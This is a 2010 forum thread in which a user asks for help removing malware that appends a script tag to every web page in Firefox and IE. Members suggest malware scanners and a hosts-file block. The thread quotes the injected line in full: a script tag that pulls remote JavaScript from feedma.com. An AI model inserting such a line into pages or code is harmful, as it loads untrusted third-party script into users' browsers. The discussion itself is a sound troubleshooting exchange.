Virus adds javascript to sites

  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Joined: Jul 18, 2008
  • Posts: 239
  • Loc: Western Australia
  • Status: Offline

Post January 4th, 2010, 7:54 am

I've got a little problem. A virus, or some kind of malicious script is appending the following code to all the sites that Firefox and IE browse to. This does not occur with Chrome or Safari.

Code: [ Select ]
...</html>
<script type="text/javascript" src="http://feedma.com/cgi-bin/cont/cont.cgi?uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}"></script>
  1. ...</html>
  2. <script type="text/javascript" src="http://feedma.com/cgi-bin/cont/cont.cgi?uuid={5809AA41-8B64-4074-8FEB-32FD41BC1113}"></script>


I'm running NoScript on Firefox so it's being blocked, but I would very much like to remove it.

I've run a thorough virus scan with Avast and an Adware scan with Ad-Aware, both with the latest updates.

I know this probably isn't the best forum for this kind of problem, but I thought you might have a good idea about the files that might be affected and I can repair.
  • Anonymous
  • Bot
  • No Avatar
  • Joined: 25 Feb 2008
  • Posts: ?
  • Loc: Ozzuland
  • Status: Online

Post January 4th, 2010, 7:54 am

  • Don2007
  • Web Master
  • Web Master
  • No Avatar
  • Joined: Nov 21, 2006
  • Posts: 4924
  • Loc: NY
  • Status: Offline

Post January 4th, 2010, 8:21 am

Does it always add it to the cgi-bin directory?
How do you know when a politician is lying? His mouth is moving.
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Joined: Jul 18, 2008
  • Posts: 239
  • Loc: Western Australia
  • Status: Offline

Post January 4th, 2010, 8:36 am

Feedma.com isn't my directory, or the directory of the site I'm viewing. It just adds the script reference (from the feedma site) to all the pages I view.

This very page I've right clicked -> View Source, and it's the same as above - the extra line is at the very end.
  • UPSGuy
  • Lurker ಠ_ಠ
  • Web Master
  • User avatar
  • Joined: Jul 25, 2005
  • Posts: 2735
  • Loc: Nashville, TN
  • Status: Offline

Post January 4th, 2010, 10:11 am

Be sure to run your AV/malware/spyware solutions of choice - looks like a popup ad script to me.
I'd love to change the world, but they won't give me the source code.
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Joined: Jul 18, 2008
  • Posts: 239
  • Loc: Western Australia
  • Status: Offline

Post January 4th, 2010, 10:19 am

UPSGuy wrote:
Be sure to run your AV/malware/spyware solutions of choice - looks like a popup ad script to me.

alex89 wrote:
I've run a thorough virus scan with Avast and an Adware scan with Ad-Aware, both with the latest updates.


But thanks for helping :roll: :P
  • Bigwebmaster
  • Site Admin
  • Site Admin
  • User avatar
  • Joined: Dec 20, 2002
  • Posts: 8923
  • Loc: Seattle, WA & Phoenix, AZ
  • Status: Online

Post January 4th, 2010, 10:28 am

Try running Malwarebytes Anti-Malware. That program seems to catch things many others don't find. Once you download it make sure you run the update program within it so that you have the latest database update.
Ozzu Hosting - Want your website on a fast server like Ozzu?
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Joined: Jul 18, 2008
  • Posts: 239
  • Loc: Western Australia
  • Status: Offline

Post January 4th, 2010, 10:33 am

Thanks for the advice :) I had mbam in my downloads folder, never installed.

Starting a full scan of drives C, D, E, F, G, H, J and I. Only 4tbs to go.

Edit: 9 objects infected already. Yay!
  • joebert
  • Sledgehammer
  • Genius
  • No Avatar
  • Joined: Feb 10, 2004
  • Posts: 13455
  • Loc: Florida
  • Status: Offline

Post January 4th, 2010, 10:35 am

In the mean time, maybe add feedma.com to your hosts file pointed back at localhost so you can browse freely.
Strong with this one, the sudo is.
  • UPSGuy
  • Lurker ಠ_ಠ
  • Web Master
  • User avatar
  • Joined: Jul 25, 2005
  • Posts: 2735
  • Loc: Nashville, TN
  • Status: Offline

Post January 4th, 2010, 10:39 am

Good call joebert. I forget about this, but I use my hosts as a cross-browser ad blocker since I swap around a lot. This site has a list that's updated pretty often.

@alex
Quote:
Be sure to run your AV/malware/spyware
:P ;)
I'd love to change the world, but they won't give me the source code.
  • alex89
  • Bronze Member
  • Bronze Member
  • User avatar
  • Joined: Jul 18, 2008
  • Posts: 239
  • Loc: Western Australia
  • Status: Offline

Post January 4th, 2010, 10:45 am

joebert wrote:
In the mean time, maybe add feedma.com to your hosts file pointed back at localhost so you can browse freely.

alex89 wrote:
I'm running NoScript on Firefox so it's being blocked


I love thinking of things before you guys do ;)

@UPSGuy

My most sincere apologies :P (Don't worry, I've got plans to make one that scans all 3 instantly with a 100% success rate)

13 objects found after 12 minutes of scanning. Should have got a mac.
  • grinch2171
  • Moderator
  • Genius
  • User avatar
  • Joined: Feb 11, 2004
  • Posts: 6740
  • Loc: Martinsburg, WV
  • Status: Offline

Post January 4th, 2010, 11:21 am

alex89 wrote:
13 objects found after 12 minutes of scanning. Should have got a mac.


I love it when people make comments like this, I find it hilarious. I haven't run an anti-virus, anti-malware, or anti-anything software on any of my home computers in years and I haven't caught a virus or anything malicious during that time. I do run a hardware firewall though. I also have two kids using those PC's and nothing. People like to point fingers at Microsoft and say it is their fault but it isn't. Most of the time it is your fault you got a virus. You clicked on something you shouldn't have, you opened an attachment you shouldn't have, or whatever. The bottom line is, you did something not Microsoft.
‎"Be polite, be professional, but have a plan to kill everybody you meet." Maj. Gen. James Mattis
  • digitalMedia
  • a.k.a. dM
  • Genius
  • User avatar
  • Joined: Dec 29, 2003
  • Posts: 5169
  • Loc: SC-USA
  • Status: Offline

Post January 4th, 2010, 11:46 am

alex89 wrote:
... Should have got a mac.


Naw, stick with computers. :)
- dM
  • joebert
  • Sledgehammer
  • Genius
  • No Avatar
  • Joined: Feb 10, 2004
  • Posts: 13455
  • Loc: Florida
  • Status: Offline

Post January 4th, 2010, 11:59 am

alex89 wrote:
joebert wrote:
In the mean time, maybe add feedma.com to your hosts file pointed back at localhost so you can browse freely.

alex89 wrote:
I'm running NoScript on Firefox so it's being blocked


I love thinking of things before you guys do ;)


I love it when people get cocky and end up with VIRUSES ON THEIR COMPUTER because they don't want to listen. ;)

Noscript for Firefox, nice. How does that help you as far as IE or the thing you probably have running in the background looking for nasty updates ?

What I want to know, is how is this thing making that line show up in the HTML source you're viewing ?
Are you sure you're not going through a proxy that's adding it or something ?

I would think that if something's hijacking the page inbetween the time it gets to your computer, to the time it gets saved to the HTML cache and displayed, ALL browsers would be affected. :scratchhead:
Strong with this one, the sudo is.
  • Don2007
  • Web Master
  • Web Master
  • No Avatar
  • Joined: Nov 21, 2006
  • Posts: 4924
  • Loc: NY
  • Status: Offline

Post January 4th, 2010, 2:32 pm

Quote from Alex89

alex89 wrote:
Feedma.com isn't my directory, or the directory of the site I'm viewing. It just adds the script reference (from the feedma site) to all the pages.


A .com is domain, it's never a directory. The code you posted showed the script in the cgi-bin directory which is why I asked about that particular directory. How did the virus writers get write access to your cgi-bin directory?
How do you know when a politician is lying? His mouth is moving.
  • digitalMedia
  • a.k.a. dM
  • Genius
  • User avatar
  • Joined: Dec 29, 2003
  • Posts: 5169
  • Loc: SC-USA
  • Status: Offline

Post January 4th, 2010, 3:04 pm

Don2007 wrote:
Quote from Alex89

alex89 wrote:
Feedma.com isn't my directory, or the directory of the site I'm viewing. It just adds the script reference (from the feedma site) to all the pages.


A .com is domain, it's never a directory. The code you posted showed the script in the cgi-bin directory which is why I asked about that particular directory. How did the virus writers get write access to your cgi-bin directory?


I think Alex meant it was a directory site. As in a link exchange directory kind of thing(I'm not going to look, personally). The URL is for THEIR cgi-bin. The virus is inserting that snippet into all the sites he views.
- dM
  • Anonymous
  • Bot
  • No Avatar
  • Joined: 25 Feb 2008
  • Posts: ?
  • Loc: Ozzuland
  • Status: Online

Post January 4th, 2010, 3:04 pm

Post Information

  • Total Posts in this topic: 18 posts
  • Users browsing this forum: No registered users and 138 guests
  • You cannot post new topics in this forum
  • You cannot reply to topics in this forum
  • You cannot edit your posts in this forum
  • You cannot delete your posts in this forum
  • You cannot post attachments in this forum
 
cron
 

© 2011 Unmelted, LLC. Ozzu® is a registered trademark of Unmelted, LLC.